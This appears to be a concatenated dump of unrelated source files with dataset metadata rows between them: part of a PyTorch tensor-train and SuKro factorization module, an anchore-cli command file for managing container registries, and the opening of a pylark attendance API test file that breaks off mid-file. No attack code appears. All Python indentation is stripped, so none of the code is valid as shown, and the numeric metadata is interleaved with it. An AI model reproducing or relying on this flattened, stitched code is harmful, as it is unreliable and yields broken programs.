self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.factors = FactorList(factors)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
full_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.tt_tensor.validate_tt_rank(full_shape, rank)
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(rank[i], s, rank[i+1])) for i, s in enumerate(full_shape)]
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank='same', **kwargs):
full_shape = tensorized_row_shape + tensorized_column_shape
n_matrices = _ensure_tuple(tensor.shape[:-len(full_shape)])
rank = tl.tt_tensor.validate_tt_rank(n_matrices + full_shape, rank)
with torch.no_grad():
factors = tensor_train(tensor, rank, **kwargs)
return cls([nn.Parameter(f) for f in factors], tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices=(),
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
with torch.no_grad():
factors = tensor_train(tensor, self.rank, **kwargs)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.factors
def to_tensor(self):
return tl.tt_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod(self.rank)
std_factors = (std/r)**(1/self.order)
with torch.no_grad():
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
factor, next_factor, *factors = self.factors
next_factor = tenalg.mode_dot(next_factor, factor[:, indices, :].squeeze(1), 0)
return self.__class__([next_factor, *factors], self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
mixing_factor, *factors = self.factors
factors = [mixing_factor[:, indices], *factors]
return self.__class__(factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
factors = []
all_contracted = True
for i, index in enumerate(indices):
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices}, indices[{i}]={index}.')
if isinstance(index, int):
if i:
factor = tenalg.mode_dot(factor, self.factors[i][:, index, :].T, -1)
else:
factor = self.factors[i][:, index, :]
else:
if i:
if all_contracted:
factor = tenalg.mode_dot(self.factors[i][:, index, :], factor, 0)
else:
factors.append(factor)
factor = self.factors[i][:, index, :]
else:
factor = self.factors[i][:, index, :]
all_contracted = False
# We have contracted all cores, so have a 2D matrix
if factor.ndim == 2:
if self.order == (i+1):
# No factors left
return factor.squeeze()
else:
next_factor, *factors = self.factors[i+1:]
factor = tenalg.mode_dot(next_factor, factor, 0)
return self.__class__([factor, *factors], self.tensorized_row_shape,
self.tensorized_column_shape,
n_matrices=self.n_matrices[len(indices):])
else:
return self.__class__([*factors, factor, *self.factors[i+1:]], self.tensorized_row_shape,
self.tensorized_column_shape,
n_matrices=self.n_matrices[len(indices):])
class TTMatrix(TensorizedMatrix, name='TTM'):
"""Tensorized Matrix in the Tensor-Train Matrix (MPO) Form
"""
def __init__(self, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=1):
super().__init__()
if rank is None:
_, self.rank = tl.tt_matrix._validate_tt_matrix(factors)
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.order = len(tensorized_row_shape)
self.factors = FactorList(factors)
self.rank = rank
self.n_matrices = _ensure_tuple(n_matrices)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
shape = tensorized_row_shape + tensorized_column_shape
rank = tl.tt_matrix.validate_tt_matrix_rank(shape, rank)
if not n_matrices:
factors = [nn.Parameter(torch.Tensor(rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1]))\
for i in range(len(tensorized_row_shape))]
elif len(n_matrices) == 1:
factors = [nn.Parameter(torch.Tensor(n_matrices[0], rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1]))\
for i in range(len(tensorized_row_shape))]
else:
raise ValueError(f'Currently a single dimension is supported for n_matrices, it should an integer (by default, 1) but got n_matrices={n_matrices}.')
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
rank = tl.tt_matrix.validate_tt_matrix_rank(tensorized_row_shape + tensorized_column_shape, rank)
if n_matrices == ():
with torch.no_grad():
factors = tensor_train_matrix(tensor, rank, **kwargs)
factors = [nn.Parameter(f) for f in factors]
else:
factors = [torch.zeros(n_matrices[0], rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1])\
for i in range(len(tensorized_row_shape))]
for i in range(n_matrices[0]):
with torch.no_grad():
factors_i = tensor_train_matrix(tensor[i], rank, **kwargs)
print(factors_i)
for j, factor in enumerate(factors_i):
factors[j][i, ...] = factor
factors = [nn.Parameter(f) for f in factors]
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
if self.n_matrices == ():
with torch.no_grad():
factors = tensor_train_matrix(tensor, self.rank, **kwargs)
factors = [nn.Parameter(f) for f in factors]
else:
factors = [torch.zeros(self.n_matrices[0], self.rank[i], self.tensorized_row_shape[i], self.tensorized_column_shape[i], self.rank[i + 1])\
for i in range(len(self.tensorized_row_shape))]
for i in range(self.n_matrices[0]):
with torch.no_grad():
factors_i = tensor_train_matrix(tensor[i], self.rank, **kwargs)
print(factors_i)
for j, factor in enumerate(factors_i):
factors[j][i, ...] = factor
factors = [nn.Parameter(f) for f in factors]
self.factors = FactorList(factors)
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.factors
def to_tensor(self):
if not self.n_matrices:
return tl.tt_matrix_to_tensor(self.decomposition)
else:
ten = tl.tt_matrix_to_tensor(self[0].decomposition)
res = torch.zeros(*self.n_matrices, *ten.shape)
res[0, ...] = ten
for i in range(1, self.n_matrices[0]):
res[i, ...] = tl.tt_matrix_to_tensor(self[i].decomposition)
return res
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod(self.rank)
std_factors = (std/r)**(1/self.order)
with torch.no_grad():
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def to_matrix(self):
if not self.n_matrices:
return tl.tt_matrix_to_matrix(self.decomposition)
else:
res = torch.zeros(*(self.n_matrices + self.shape))
for i in range(self.n_matrices[0]):
res[i, ...] = tl.tt_matrix_to_matrix(self[i].decomposition)
return res
def __getitem__(self, indices):
if not isinstance(indices, int) or not self.n_matrices:
raise ValueError(f'Currently only indexing over n_matrices is supported for TTMatrices.')
return self.__class__([f[indices, ...] for f in self.factors],
self.tensorized_row_shape, self.tensorized_column_shape, self.rank, self.n_matrices[1:])
def __torch_function__(self, func, types, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
args = [t.to_matrix() if hasattr(t, 'to_matrix') else t for t in args]
return func(*args, **kwargs)
### Auxiliary functions for SuKro factorization
def rearrange(D,n,m,n_matrices=()):
# Input matrix D is of size (n_matrices x prod(n) x prod(m))
# Output tensor R_D is of size (n_matrices x n[0]m[0] x n[1]m[1] x ... x n[-1]m[-1])
assert len(n)==len(m)
#Handle n_matrices
tosqueeze = ()
if n_matrices == ():
D = torch.unsqueeze(D,0)
tosqueeze = True
n_matrices = (1,)
# Main recursion
if len(n)==1: # Base case: vectorizes a given block.
return D.reshape(n_matrices + (-1,))
else:
# Block sizes
n_rows = np.prod(n[1:])
n_cols = np.prod(m[1:])
# Go over each block of the matrix. Then recursively go over all sub-blocks in the block.
for i1 in range(n[0]):
for j1 in range(m[0]):
# Reorders the block and concatenates the results
res = rearrange(D[:,i1*n_rows:(i1+1)*n_rows, j1*n_cols:(j1+1)*n_cols], n[1:], m[1:], n_matrices)
res = torch.unsqueeze(res,1)
R_D = tl.concatenate((R_D,res), axis=1) if (i1,j1) != (0,0) else res
return torch.squeeze(R_D,0) if tosqueeze else R_D
def rearrange_inv(R_D,n,m,n_matrices=()):
# Input tensor R_D is of size (n_matrices x n[0]m[0] x n[1]m[1] x ... x n[-1]m[-1])
# Output matrix D is of size (n_matrices x prod(n) x prod(m))
assert len(n)==len(m)
#Handle n_matrices
tosqueeze = ()
if n_matrices == ():
R_D = torch.unsqueeze(R_D,0)
tosqueeze = True
n_matrices = (1,)
# Main recursion
if len(n)==1: # Base case: unvectorizes a given block.
return R_D.reshape(n_matrices+n+m)
else:
# Go over each block of the tensor. Then recursively go over all fibers in the slice.
for i1 in range(n[0]):
for j1 in range(m[0]):
# Reorders the block and concatenates the results
res = rearrange_inv(R_D[:,i1*m[0] + j1], n[1:], m[1:], n_matrices)
D_i = tl.concatenate((D_i, res), axis=2) if j1 != 0 else res
D = tl.concatenate((D,D_i), axis=1) if i1 != 0 else D_i
return torch.squeeze(D,0) if tosqueeze else D
class SuKroMatrix(TensorizedMatrix, name='SuKro'):
"""Tensorized Matrix in SuKro (sum of Kroneckers) Form.
Matrix is tensorized with a particular entries rearrangement. Then CP factorization is applied.
"""
def __init__(self, weights, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.cp_tensor._validate_cp_tensor((weights, factors))
else:
self.rank = rank
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.order = len(factors)
self.weights = weights
self.factors = factors
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
# Shape of the rearrange tensor is (n[0]m[0]x...x n[-1]m[-1]) not (n[0]x...x n[-1] x m[0]x...x m[-1])
tensor_shape = n_matrices + tuple([n*m for n, m in zip(tensorized_row_shape, tensorized_column_shape)])
rank = tl.cp_tensor.validate_cp_rank(tensor_shape, rank)
if len(tensor_shape)==2: # rank cannot exceed matrix dimensions when using SVD
rank = min(rank, max(tensor_shape))
# Register the parameters
weights = nn.Parameter(torch.Tensor(rank))
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(s, rank)) for s in tensor_shape]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), init='random', **kwargs):
# tensor is supposed to be already rearranged
n_matrices = _ensure_tuple(n_matrices)
rank = tl.cp_tensor.validate_cp_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
weights, factors = parafac(tensor, rank, **kwargs)
weights = nn.Parameter(weights)
factors = [nn.Parameter(f) for f in factors]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = rearrange(matrix, tensorized_row_shape, tensorized_column_shape, n_matrices)
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
#tensor is supposed to be already rearranged
with torch.no_grad():
weights, factors = parafac(tensor, self.rank, **kwargs)
self.weights = nn.Parameter(weights)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = rearrange(matrix, self.tensorized_row_shape, self.tensorized_column_shape, self.n_matrices)
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.weights, self.factors
def to_tensor(self):
return tl.cp_to_tensor(self.decomposition)
def to_matrix(self):
# Create sukro_to_matrix in tensorly, similar to tt_matrix_to_matrix or cp_to_tensor ?
# There are two ways to implement this:
# 1) Inverse rearrangement on the resulting CP tensor (implemented below)
# 2) Matricizing columns of the cp factors and taking the Kronecker product
tensor = tl.cp_to_tensor(self.decomposition)
return rearrange_inv(tensor, self.tensorized_row_shape, self.tensorized_column_shape, self.n_matrices)
def normal_(self, mean=0, std=1):
super().normal_(mean, std)
std_factors = (std/math.sqrt(self.rank))**(1/self.order)
with torch.no_grad():
self.weights.fill_(1)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
weights = self.weights*mixing_factor[indices, :]
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
# Index part of a factor
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
weights = self.weights
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
factors = self.factors
index_factors = []
weights = self.weights
for index in indices:
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices} which contains one.')
mixing_factor, *factors = factors
if isinstance(index, int):
if factors or index_factors:
weights = weights*mixing_factor[index, :]
else:
# No factors left
return tl.sum(weights*mixing_factor[index, :])
else:
index_factors.append(mixing_factor[index])
return self.__class__(weights, index_factors+factors, self.shape, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
| 43.216578
| 160
| 0.62176
| 4,001
| 32,326
| 4.773807
| 0.066483
| 0.07445
| 0.091414
| 0.085026
| 0.815812
| 0.794555
| 0.770471
| 0.752565
| 0.72801
| 0.718115
| 0
| 0.006377
| 0.277238
| 32,326
| 748
| 161
| 43.216578
| 0.81112
| 0.070995
| 0
| 0.728597
| 0
| 0.001821
| 0.024301
| 0.002206
| 0
| 0
| 0
| 0
| 0.003643
| 1
| 0.102004
| false
| 0
| 0.016393
| 0.016393
| 0.258652
| 0.003643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cd57eedefda5f227cb6de1983a7db0cba49ab3d
| 7,483
|
py
|
Python
|
anchorecli/cli/registry.py
|
PeteGoo/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | 1
|
2018-09-17T12:01:22.000Z
|
2018-09-17T12:01:22.000Z
|
anchorecli/cli/registry.py
|
LuksJobs/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | null | null | null |
anchorecli/cli/registry.py
|
LuksJobs/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
import re
import json
import click
import anchorecli.clients.apiexternal
config = {}
@click.group(name='registry', short_help='Registry operations')
@click.pass_obj
def registry(ctx_config):
global config
config = ctx_config
try:
anchorecli.cli.utils.check_access(config)
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry', {}, err))
sys.exit(2)
@registry.command(name='add', short_help="Add a registry")
@click.argument('registry', nargs=1, required=True)
@click.argument('registry_user', nargs=1, required=True)
@click.argument('registry_pass', nargs=1, required=True)
@click.option('--insecure', is_flag=True, default=False, help="Allow connection to registry without SSL cert checks (ex: if registry uses a self-signed SSL certificate)")
@click.option('--registry-type', help="Specify the registry type (default='docker_v2')")
@click.option('--skip-validate', is_flag=True, help="Do not attempt to validate registry/creds on registry add")
def add(registry, registry_user, registry_pass, insecure, registry_type, skip_validate):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
REGISTRY_USER: Username
REGISTRY_PASS: Password
"""
ecode = 0
registry_types = ['docker_v2', 'awsecr']
try:
if registry_type and registry_type not in registry_types:
raise Exception ("input registry type not supported (supported registry_types: " + str(registry_types))
#try to detect awsecr registry of form <accid>.dkr.ecr.<region>.amazonaws.com
if not registry_type:
if re.match("[0-9]+\.dkr\.ecr\..*\.amazonaws\.com", registry):
sys.stderr.write("WARN: setting registry type to 'awsecr' based on form of input registry name, remove and re-add using '--registry-type docker_v2' to override\n")
registry_type = "awsecr"
else:
registry_type = "docker_v2"
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.add_registry(config, registry=registry, registry_user=registry_user, registry_pass=registry_pass, registry_type=registry_type, insecure=insecure, validate=(not skip_validate))
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_add', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_add', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='update', short_help="Update an existing registry")
@click.argument('registry', nargs=1, required=True)
@click.argument('registry_user', nargs=1, required=True)
@click.argument('registry_pass', nargs=1, required=True)
@click.option('--insecure', is_flag=True, default=False, help="Allow connection to registry without SSL cert checks (ex: if registry uses a self-signed SSL certificate)")
@click.option('--registry-type', default='docker_v2', help="Specify the registry type (default='docker_v2')")
@click.option('--skip-validate', is_flag=True, help="Do not attempt to validate registry/creds on registry add")
def upd(registry, registry_user, registry_pass, insecure, registry_type, skip_validate):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
REGISTRY_USER: Username
REGISTRY_PASS: Password
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.update_registry(config, registry=registry, registry_user=registry_user, registry_pass=registry_pass, registry_type=registry_type, insecure=insecure, validate=(not skip_validate))
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_update', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_update', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='del', short_help="Delete a registry")
@click.argument('registry', nargs=1, required=True)
def delete(registry):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.delete_registry(config, registry)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_delete', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_delete', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='list', short_help="List all current registries")
def registrylist():
ecode = 0
try:
ret = anchorecli.clients.apiexternal.get_registry(config)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_list', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_list', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='get', short_help="Get a registry")
@click.argument('registry', nargs=1, required=True)
def get(registry):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.get_registry(config, registry=registry)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_get', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_get', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
| 42.276836
| 223
| 0.675932
| 948
| 7,483
| 5.234177
| 0.155063
| 0.057638
| 0.079807
| 0.050988
| 0.811165
| 0.808142
| 0.808142
| 0.795042
| 0.795042
| 0.794841
| 0
| 0.007981
| 0.196312
| 7,483
| 176
| 224
| 42.517045
| 0.817093
| 0.076974
| 0
| 0.593496
| 0
| 0.056911
| 0.260659
| 0.011429
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0.056911
| 0.04878
| 0
| 0.097561
| 0.089431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1cf37a4070df1e59f74713639d6db1191b62053d
| 35
|
py
|
Python
|
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | 2
|
2020-08-28T08:34:18.000Z
|
2020-08-28T09:36:20.000Z
|
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | null | null | null |
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | null | null | null |
from .run_on_gce import run_on_gce
| 17.5
| 34
| 0.857143
| 8
| 35
| 3.25
| 0.625
| 0.384615
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1cf5141e3bfff2ec4b0a85cfcd6054fbea17bb02
| 42,069
|
py
|
Python
|
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 7
|
2021-08-18T00:42:05.000Z
|
2022-03-14T09:49:15.000Z
|
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | null | null | null |
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 1
|
2022-03-14T09:49:20.000Z
|
2022-03-14T09:49:20.000Z
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
import unittest
import pylark
import pytest
from tests.test_conf import app_all_permission, app_no_permission
from tests.test_helper import mock_get_tenant_access_token_failed
def mock(*args, **kwargs):
raise pylark.PyLarkError(scope="scope", func="func", code=1, msg="mock-failed")
def mock_raw_request(*args, **kwargs):
raise pylark.PyLarkError(
scope="scope", func="func", code=1, msg="mock-raw-request-failed"
)
# mock get token
class TestAttendanceSampleMockGetTokenFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockGetTokenFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.cli.auth.get_tenant_access_token = mock_get_tenant_access_token_failed
self.cli.auth.get_app_access_token = mock_get_tenant_access_token_failed
self.module_cli = self.cli.attendance
def test_mock_get_token_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(pylark.DownloadAttendanceFileReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(pylark.DeleteAttendanceGroupReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(pylark.GetAttendanceGroupReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(pylark.DeleteAttendanceShiftReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(pylark.GetAttendanceUserFlowReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
